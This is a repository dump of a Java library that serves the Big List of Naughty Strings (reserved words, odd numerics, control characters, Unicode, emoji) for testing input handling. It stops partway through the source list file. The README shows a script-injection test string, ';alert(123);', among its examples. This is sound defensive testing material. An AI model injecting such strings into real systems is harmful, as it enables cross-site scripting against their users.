├── .gitattributes ├── .gitignore ├── CHANGELOG.md ├── LICENSE ├── README.md ├── build.gradle ├── gradle └── wrapper │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── settings.gradle └── src ├── main └── java │ └── io │ └── github │ └── nowshad │ ├── BLNS.java │ ├── BLNSInternal.java │ └── NaughtyStrings.java └── test └── java └── io └── github └── nowshad ├── BLNSInternalTest.java ├── BLNSTest.java └── NaughtyStringsTest.java /.gitattributes: -------------------------------------------------------------------------------- 1 | # 2 | # https://help.github.com/articles/dealing-with-line-endings/ 3 | # 4 | # Linux start script should use lf 5 | /gradlew text eol=lf 6 | 7 | # These are Windows script files and should use crlf 8 | *.bat text eol=crlf 9 | 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled class file 2 | *.class 3 | 4 | # Log file 5 | *.log 6 | 7 | # BlueJ files 8 | *.ctxt 9 | 10 | # Mobile Tools for Java (J2ME) 11 | .mtj.tmp/ 12 | 13 | # Package Files # 14 | *.jar 15 | *.war 16 | *.nar 17 | *.ear 18 | *.zip 19 | *.tar.gz 20 | *.rar 21 | 22 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 23 | hs_err_pid* 24 | 25 | .idea 26 | naughty-strings-java.iml 27 | 28 | # Ignore Gradle project-specific cache directory 29 | .gradle 30 | 31 | # Ignore Gradle build output directory 32 | build 33 | 34 | # Ignore the credentials container file 35 | gradle.properties 36 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## [1.0.1] - 2022-10-22 2 | ### Changed 3 | 4 | - Refactor codebase under a package name 5 | 6 | ## [1.0.0] - 2022-10-15 7 | ### Added 8 | - Add NaughtyStrings data into a single file 9 | - Add enum for all types of strings 10 | 
- Add public method to access data 11 | - Add MIT LICENSE -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Nowshad Hasan 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Naughty-Strings Java 2 | Java API for the [Big List of Naughty Strings](https://github.com/minimaxir/big-list-of-naughty-strings). 3 | 4 | [CHANGELOG](https://github.com/nowshad-hasan/naughty-strings-java/blob/main/CHANGELOG.md) is here. 5 | ## Description 6 | Sometimes we need to test our user input with different types of strings. It might be character, icon, emoji, SQL injection etc. 
This library is built to test how user-input handling copes with those **_totally unpredictable_** strings. We call them **Naughty Strings**. 7 | Some examples below:
8 | Ω≈ç√∫˜µ≤≥÷
9 | åß∂ƒ©˙∆˚¬…æ
10 | œ∑´®†¥¨ˆøπ“‘
11 | ¡™£¢∞§¶•ªº–≠
12 | ¸˛Ç◊ı˜Â¯˘¿
13 | 👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂
14 | ;alert(123);
15 | 社會科學院語學研究所
16 | (。◕ ∀ ◕。)
17 | 18 | ## Installation 19 | Gradle:
20 | ``` 21 | implementation 'io.github.nowshad-hasan:naughty-strings-java:1.0.1' 22 | ``` 23 | Maven:
24 | ```` 25 | <dependency> 26 | <groupId>io.github.nowshad-hasan</groupId> 27 | <artifactId>naughty-strings-java</artifactId> 28 | <version>1.0.1</version> 29 | </dependency> 30 | ```` 31 | Please go to [Maven Repository](https://mvnrepository.com/artifact/io.github.nowshad-hasan/naughty-strings-java) for other dependencies. 32 | ## Usage 33 | We can use it in two ways. 34 | 35 | 1. Get all the strings of a type 36 | ````java 37 | List<String> naughtyStringList = BLNS.getList(NaughtyStrings.RESERVED_STRINGS); 38 | ```` 39 | 40 | If we want all the naughty strings, then we must pass the enum `NaughtyStrings.ALL`. 41 | 42 | 2. Get a custom-size list of random strings of a type 43 | 44 | ````java 45 | List<String> randomNaughtyStringList = BLNS.getRandomList(10, NaughtyStrings.NUMERIC_STRINGS); 46 | ```` 47 | We have to pass `NaughtyStrings.ALL` to get a random custom-size list from all the naughty strings. In a test, we feed each returned string to the input-handling code and assert that it is treated as data (stored, escaped or rejected), never interpreted. 48 | 49 | ## Contribution 50 | 51 | Please feel free to contribute to this project by solving any critical issue, typo, 52 | code-structure improvement etc. 53 | Open an issue [here](https://github.com/nowshad-hasan/naughty-strings-java/issues/new) with a description, screenshot and anything else you need. 54 | 55 | Pull Requests are most welcome. Read the guide from [opensource.com](https://opensource.com/article/19/7/create-pull-request-github) 56 | or [GitHub docs](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/creating-a-pull-request) 57 | and make a PR with your desired code. We will definitely look into it. 
58 | 59 | 60 | -------------------------------------------------------------------------------- /build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'java' 3 | id 'maven-publish' 4 | id 'signing' 5 | } 6 | group 'io.github.nowshad-hasan' 7 | version '1.0.1' 8 | 9 | repositories { 10 | mavenCentral() 11 | maven { url "https://oss.sonatype.org/content/repositories/snapshots/" } 12 | } 13 | 14 | java { 15 | withJavadocJar() 16 | withSourcesJar() 17 | } 18 | 19 | publishing { 20 | publications { 21 | 22 | mavenJava(MavenPublication) { 23 | 24 | groupId = 'io.github.nowshad-hasan' 25 | artifactId = 'naughty-strings-java' 26 | version = '1.0.1' 27 | from components.java 28 | 29 | pom { 30 | name = 'Naughty Strings Java' 31 | description = 'Naughty Strings Java is an API for testing different types of user input for strings.' + 32 | ' It contains emoji, icon, sql injection and others type of data.' 33 | url = 'https://github.com/nowshad-hasan/naughty-strings-java' 34 | inceptionYear = '2022' 35 | 36 | licenses { 37 | license { 38 | name = 'MIT License' 39 | url = 'https://opensource.org/licenses/MIT' 40 | } 41 | } 42 | developers { 43 | developer { 44 | id = 'nowshad-hasan' 45 | name = 'Nowshad Hasan' 46 | email = 'nowshadapu@gmail.com' 47 | } 48 | } 49 | scm { 50 | connection = 'scm:git:git:github.com/nowshad-hasan/naughty-strings-java.git' 51 | developerConnection = 'scm:git:ssh://github.com/nowshad-hasan/naughty-strings-java.git' 52 | url = 'https://github.com/nowshad-hasan/naughty-strings-java' 53 | } 54 | } 55 | } 56 | } 57 | 58 | repositories { 59 | maven { 60 | name = "OSSRH" 61 | url = "https://s01.oss.sonatype.org/service/local/staging/deploy/maven2/" 62 | credentials { 63 | username = project.properties["username"] 64 | password = project.properties["password"] 65 | } 66 | } 67 | } 68 | } 69 | 70 | signing { 71 | sign publishing.publications.mavenJava 72 | } 73 | 74 | javadoc { 75 | if 
(JavaVersion.current().isJava9Compatible()) { 76 | options.addBooleanOption('html5', true) 77 | } 78 | } 79 | 80 | dependencies { 81 | testImplementation 'org.junit.jupiter:junit-jupiter-api:5.7.0' 82 | testRuntimeOnly 'org.junit.jupiter:junit-jupiter-engine:5.7.0' 83 | } 84 | 85 | test { 86 | useJUnitPlatform() 87 | } -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.5-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists -------------------------------------------------------------------------------- /gradlew: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # Copyright © 2015-2021 the original authors. 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # https://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | # 18 | 19 | ############################################################################## 20 | # 21 | # Gradle start up script for POSIX generated by Gradle. 22 | # 23 | # Important for running: 24 | # 25 | # (1) You need a POSIX-compliant shell to run this script. 
If your /bin/sh is 26 | # noncompliant, but you have some other compliant shell such as ksh or 27 | # bash, then to run this script, type that shell name before the whole 28 | # command line, like: 29 | # 30 | # ksh Gradle 31 | # 32 | # Busybox and similar reduced shells will NOT work, because this script 33 | # requires all of these POSIX shell features: 34 | # * functions; 35 | # * expansions «$var», «${var}», «${var:-default}», «${var+SET}», 36 | # «${var#prefix}», «${var%suffix}», and «$( cmd )»; 37 | # * compound commands having a testable exit status, especially «case»; 38 | # * various built-in commands including «command», «set», and «ulimit». 39 | # 40 | # Important for patching: 41 | # 42 | # (2) This script targets any POSIX shell, so it avoids extensions provided 43 | # by Bash, Ksh, etc; in particular arrays are avoided. 44 | # 45 | # The "traditional" practice of packing multiple parameters into a 46 | # space-separated string is a well documented source of bugs and security 47 | # problems, so this is (mostly) avoided, by progressively accumulating 48 | # options in "$@", and eventually passing that to Java. 49 | # 50 | # Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, 51 | # and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; 52 | # see the in-line comments for details. 53 | # 54 | # There are tweaks for specific operating systems such as AIX, CygWin, 55 | # Darwin, MinGW, and NonStop. 56 | # 57 | # (3) This script is generated from the Groovy template 58 | # https://github.com/gradle/gradle/blob/master/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt 59 | # within the Gradle project. 60 | # 61 | # You can find Gradle at https://github.com/gradle/gradle/. 
62 | # 63 | ############################################################################## 64 | 65 | # Attempt to set APP_HOME 66 | 67 | # Resolve links: $0 may be a link 68 | app_path=$0 69 | 70 | # Need this for daisy-chained symlinks. 71 | while 72 | APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path 73 | [ -h "$app_path" ] 74 | do 75 | ls=$( ls -ld "$app_path" ) 76 | link=${ls#*' -> '} 77 | case $link in #( 78 | /*) app_path=$link ;; #( 79 | *) app_path=$APP_HOME$link ;; 80 | esac 81 | done 82 | 83 | APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit 84 | 85 | APP_NAME="Gradle" 86 | APP_BASE_NAME=${0##*/} 87 | 88 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 89 | DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' 90 | 91 | # Use the maximum available, or set MAX_FD != -1 to use that value. 92 | MAX_FD=maximum 93 | 94 | warn () { 95 | echo "$*" 96 | } >&2 97 | 98 | die () { 99 | echo 100 | echo "$*" 101 | echo 102 | exit 1 103 | } >&2 104 | 105 | # OS specific support (must be 'true' or 'false'). 106 | cygwin=false 107 | msys=false 108 | darwin=false 109 | nonstop=false 110 | case "$( uname )" in #( 111 | CYGWIN* ) cygwin=true ;; #( 112 | Darwin* ) darwin=true ;; #( 113 | MSYS* | MINGW* ) msys=true ;; #( 114 | NONSTOP* ) nonstop=true ;; 115 | esac 116 | 117 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 118 | 119 | 120 | # Determine the Java command to use to start the JVM. 121 | if [ -n "$JAVA_HOME" ] ; then 122 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 123 | # IBM's JDK on AIX uses strange locations for the executables 124 | JAVACMD=$JAVA_HOME/jre/sh/java 125 | else 126 | JAVACMD=$JAVA_HOME/bin/java 127 | fi 128 | if [ ! -x "$JAVACMD" ] ; then 129 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 130 | 131 | Please set the JAVA_HOME variable in your environment to match the 132 | location of your Java installation." 
133 | fi 134 | else 135 | JAVACMD=java 136 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 137 | 138 | Please set the JAVA_HOME variable in your environment to match the 139 | location of your Java installation." 140 | fi 141 | 142 | # Increase the maximum file descriptors if we can. 143 | if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then 144 | case $MAX_FD in #( 145 | max*) 146 | MAX_FD=$( ulimit -H -n ) || 147 | warn "Could not query maximum file descriptor limit" 148 | esac 149 | case $MAX_FD in #( 150 | '' | soft) :;; #( 151 | *) 152 | ulimit -n "$MAX_FD" || 153 | warn "Could not set maximum file descriptor limit to $MAX_FD" 154 | esac 155 | fi 156 | 157 | # Collect all arguments for the java command, stacking in reverse order: 158 | # * args from the command line 159 | # * the main class name 160 | # * -classpath 161 | # * -D...appname settings 162 | # * --module-path (only if needed) 163 | # * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 164 | 165 | # For Cygwin or MSYS, switch paths to Windows format before running java 166 | if "$cygwin" || "$msys" ; then 167 | APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) 168 | CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) 169 | 170 | JAVACMD=$( cygpath --unix "$JAVACMD" ) 171 | 172 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 173 | for arg do 174 | if 175 | case $arg in #( 176 | -*) false ;; # don't mess with options #( 177 | /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath 178 | [ -e "$t" ] ;; #( 179 | *) false ;; 180 | esac 181 | then 182 | arg=$( cygpath --path --ignore --mixed "$arg" ) 183 | fi 184 | # Roll the args list around exactly as many times as the number of 185 | # args, so each arg winds up back in the position where it started, but 186 | # possibly modified. 
187 | # 188 | # NB: a `for` loop captures its iteration list before it begins, so 189 | # changing the positional parameters here affects neither the number of 190 | # iterations, nor the values presented in `arg`. 191 | shift # remove old arg 192 | set -- "$@" "$arg" # push replacement arg 193 | done 194 | fi 195 | 196 | # Collect all arguments for the java command; 197 | # * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of 198 | # shell script including quotes and variable substitutions, so put them in 199 | # double quotes to make sure that they get re-expanded; and 200 | # * put everything else in single quotes, so that it's not re-expanded. 201 | 202 | set -- \ 203 | "-Dorg.gradle.appname=$APP_BASE_NAME" \ 204 | -classpath "$CLASSPATH" \ 205 | org.gradle.wrapper.GradleWrapperMain \ 206 | "$@" 207 | 208 | # Stop when "xargs" is not available. 209 | if ! command -v xargs >/dev/null 2>&1 210 | then 211 | die "xargs is not available" 212 | fi 213 | 214 | # Use "xargs" to parse quoted args. 215 | # 216 | # With -n1 it outputs one arg per line, with the quotes and backslashes removed. 217 | # 218 | # In Bash we could simply go: 219 | # 220 | # readarray ARGS < <( xargs -n1 <<<"$var" ) && 221 | # set -- "${ARGS[@]}" "$@" 222 | # 223 | # but POSIX shell has neither arrays nor command substitution, so instead we 224 | # post-process each arg (as a line of input to sed) to backslash-escape any 225 | # character that might be a shell metacharacter, then use eval to reverse 226 | # that process (while maintaining the separation between arguments), and wrap 227 | # the whole thing up as a single "set" statement. 228 | # 229 | # This will of course break if any of these variables contains a newline or 230 | # an unmatched quote. 
231 | # 232 | 233 | eval "set -- $( 234 | printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | 235 | xargs -n1 | 236 | sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | 237 | tr '\n' ' ' 238 | )" '"$@"' 239 | 240 | exec "$JAVACMD" "$@" 241 | -------------------------------------------------------------------------------- /gradlew.bat: -------------------------------------------------------------------------------- 1 | @rem 2 | @rem Copyright 2015 the original author or authors. 3 | @rem 4 | @rem Licensed under the Apache License, Version 2.0 (the "License"); 5 | @rem you may not use this file except in compliance with the License. 6 | @rem You may obtain a copy of the License at 7 | @rem 8 | @rem https://www.apache.org/licenses/LICENSE-2.0 9 | @rem 10 | @rem Unless required by applicable law or agreed to in writing, software 11 | @rem distributed under the License is distributed on an "AS IS" BASIS, 12 | @rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | @rem See the License for the specific language governing permissions and 14 | @rem limitations under the License. 15 | @rem 16 | 17 | @if "%DEBUG%"=="" @echo off 18 | @rem ########################################################################## 19 | @rem 20 | @rem Gradle startup script for Windows 21 | @rem 22 | @rem ########################################################################## 23 | 24 | @rem Set local scope for the variables with windows NT shell 25 | if "%OS%"=="Windows_NT" setlocal 26 | 27 | set DIRNAME=%~dp0 28 | if "%DIRNAME%"=="" set DIRNAME=. 29 | set APP_BASE_NAME=%~n0 30 | set APP_HOME=%DIRNAME% 31 | 32 | @rem Resolve any "." and ".." in APP_HOME to make it shorter. 33 | for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi 34 | 35 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 
36 | set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" 37 | 38 | @rem Find java.exe 39 | if defined JAVA_HOME goto findJavaFromJavaHome 40 | 41 | set JAVA_EXE=java.exe 42 | %JAVA_EXE% -version >NUL 2>&1 43 | if %ERRORLEVEL% equ 0 goto execute 44 | 45 | echo. 46 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 47 | echo. 48 | echo Please set the JAVA_HOME variable in your environment to match the 49 | echo location of your Java installation. 50 | 51 | goto fail 52 | 53 | :findJavaFromJavaHome 54 | set JAVA_HOME=%JAVA_HOME:"=% 55 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 56 | 57 | if exist "%JAVA_EXE%" goto execute 58 | 59 | echo. 60 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 61 | echo. 62 | echo Please set the JAVA_HOME variable in your environment to match the 63 | echo location of your Java installation. 64 | 65 | goto fail 66 | 67 | :execute 68 | @rem Setup the command line 69 | 70 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 71 | 72 | 73 | @rem Execute Gradle 74 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* 75 | 76 | :end 77 | @rem End local scope for the variables with windows NT shell 78 | if %ERRORLEVEL% equ 0 goto mainEnd 79 | 80 | :fail 81 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 82 | rem the _cmd.exe /c_ return code! 
83 | set EXIT_CODE=%ERRORLEVEL% 84 | if %EXIT_CODE% equ 0 set EXIT_CODE=1 85 | if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% 86 | exit /b %EXIT_CODE% 87 | 88 | :mainEnd 89 | if "%OS%"=="Windows_NT" endlocal 90 | 91 | :omega 92 | -------------------------------------------------------------------------------- /settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'naughty-strings-java' -------------------------------------------------------------------------------- /src/main/java/io/github/nowshad/BLNS.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import java.util.List; 4 | 5 | 6 | /** 7 | * @author Nowshad Hasan 8 | * @since 12/7/22 11:07 pm 9 | */ 10 | public class BLNS { 11 | 12 | public static List getRandomList(int size, NaughtyStrings type) { 13 | return BLNSInternal.getRandomStrings(size, type); 14 | } 15 | 16 | public static List getList(NaughtyStrings type) { 17 | return BLNSInternal.getStrings(type); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/io/github/nowshad/BLNSInternal.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import java.util.ArrayList; 4 | import java.util.Arrays; 5 | import java.util.List; 6 | import java.util.Random; 7 | import java.util.stream.Collectors; 8 | 9 | class BLNSInternal { 10 | static final List RESERVED_STRINGS = Arrays.asList( 11 | "", 12 | "undefined", 13 | "undef", 14 | "null", 15 | "NULL", 16 | "(null)", 17 | "nil", 18 | "NIL", 19 | "true", 20 | "false", 21 | "True", 22 | "False", 23 | "TRUE", 24 | "FALSE", 25 | "None", 26 | "hasOwnProperty", 27 | "then", 28 | "\\", 29 | "\\\\" 30 | ); 31 | static List NUMERIC_STRINGS = Arrays.asList( 32 | "0", 33 | "1", 34 | "1.00", 35 | "$1.00", 36 | "1/2", 37 | "1E2", 38 | "1E02", 39 | 
"1E+02", 40 | "-1", 41 | "-1.00", 42 | "-$1.00", 43 | "-1/2", 44 | "-1E2", 45 | "-1E02", 46 | "-1E+02", 47 | "1/0", 48 | "0/0", 49 | "-2147483648/-1", 50 | "-9223372036854775808/-1", 51 | "-0", 52 | "-0.0", 53 | "+0", 54 | "+0.0", 55 | "0.00", 56 | "0..0", 57 | ".", 58 | "0.0.0", 59 | "0,00", 60 | "0,,0", 61 | ",", 62 | "0,0,0", 63 | "0.0/0", 64 | "1.0/0.0", 65 | "0.0/0.0", 66 | "1,0/0,0", 67 | "0,0/0,0", 68 | "--1", 69 | "-", 70 | "-.", 71 | "-,", 72 | "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", 73 | "NaN", 74 | "Infinity", 75 | "-Infinity", 76 | "INF", 77 | "1#INF", 78 | "-1#IND", 79 | "1#QNAN", 80 | "1#SNAN", 81 | "1#IND", 82 | "0x0", 83 | "0xffffffff", 84 | "0xffffffffffffffff", 85 | "0xabad1dea", 86 | "123456789012345678901234567890123456789", 87 | "1,000.00", 88 | "1 000.00", 89 | "1'000.00", 90 | "1,000,000.00", 91 | "1 000 000.00", 92 | "1'000'000.00", 93 | "1.000,00", 94 | "1 000,00", 95 | "1'000,00", 96 | "1.000.000,00", 97 | "1 000 000,00", 98 | "1'000'000,00", 99 | "01000", 100 | "08", 101 | "09", 102 | "2.2250738585072011e-308" 103 | ); 104 | static List SPECIAL_CHARACTERS = Arrays.asList( 105 | ",./;'[]\\-=", 106 | "<>?:\"{}|_+", 107 | "!@#$%^&*()`~", 108 | "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f", 109 | "€", 110 | "\t\u000b\f  ", 111 | "𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿", 112 | "", 113 | "￾" 114 | ); 115 | static List UNICODE_SYMBOLS = Arrays.asList( 116 | "Ω≈ç√∫˜µ≤≥÷", 117 | "åß∂ƒ©˙∆˚¬…æ", 118 | "œ∑´®†¥¨ˆøπ“‘", 119 | "¡™£¢∞§¶•ªº–≠", 120 | "¸˛Ç◊ı˜Â¯˘¿", 121 | "ÅÍÎÏ˝ÓÔÒÚÆ☃", 122 | "Œ„´‰ˇÁ¨ˆØ∏”’", 123 | "`⁄€‹›fifl‡°·‚—±", 124 | "⅛⅜⅝⅞", 125 | "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя", 126 | "٠١٢٣٤٥٦٧٨٩" 127 | ); 128 | static List UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS = 
Arrays.asList( 129 | "⁰⁴⁵", 130 | "₀₁₂", 131 | "⁰⁴⁵₀₁₂", 132 | "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็" 133 | ); 134 | static List QUOTATION_MARKS = Arrays.asList( 135 | "'", 136 | "\"", 137 | "''", 138 | "\"\"", 139 | "'\"'", 140 | "\"''''\"'\"", 141 | "\"'\"'\"''''\"", 142 | "", 143 | "", 144 | "", 145 | "" 146 | ); 147 | static List TWO_BYTE_CHARACTERS = Arrays.asList( 148 | "田中さんにあげて下さい", 149 | "パーティーへ行かないか", 150 | "和製漢語", 151 | "部落格", 152 | "사회과학원 어학연구소", 153 | "찦차를 타고 온 펲시맨과 쑛다리 똠방각하", 154 | "社會科學院語學研究所", 155 | "울란바토르", 156 | "𠜎𠜱𠝹𠱓𠱸𠲖𠳏" 157 | ); 158 | static List TWO_BYTE_LETTER = Arrays.asList( 159 | "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆" 160 | ); 161 | static List SPECIAL_UNICODE_CHARACTERS_UNION = Arrays.asList( 162 | "表", 163 | "ポ", 164 | "あ", 165 | "A", 166 | "鷗", 167 | "Œ", 168 | "é", 169 | "B", 170 | "逍", 171 | "Ü", 172 | "ß", 173 | "ª", 174 | "ą", 175 | "ñ", 176 | "丂", 177 | "㐀", 178 | "𠀀" 179 | ); 180 | static List CHANGING_LENGTH_WHEN_LOWERCASE = Arrays.asList( 181 | "Ⱥ", 182 | "Ⱦ" 183 | ); 184 | static List JAPANESE_EMOTICONS = Arrays.asList( 185 | "ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ", 186 | "(。◕ ∀ ◕。)", 187 | "`ィ(´∀`∩", 188 | "__ロ(,_,*)", 189 | "・( ̄∀ ̄)・:*:", 190 | "゚・✿ヾ╲(。◕‿◕。)╱✿・゚", 191 | ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’", 192 | "(╯°□°)╯︵ ┻━┻)", 193 | "(ノಥ益ಥ) ┻━┻", 194 | "┬─┬ノ( º _ ºノ)", 195 | "( ͡° ͜ʖ ͡°)", 196 | "¯\\_(ツ)_/¯" 197 | ); 198 | static List EMOJI = Arrays.asList( 199 | "😍", 200 | "👩🏽", 201 | "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️", 202 | "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍", 203 | "🐵 🙈 🙉 🙊", 204 | "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙", 205 | "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿", 206 | "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦", 207 | "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧", 208 | "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟" 209 | ); 210 | static List 
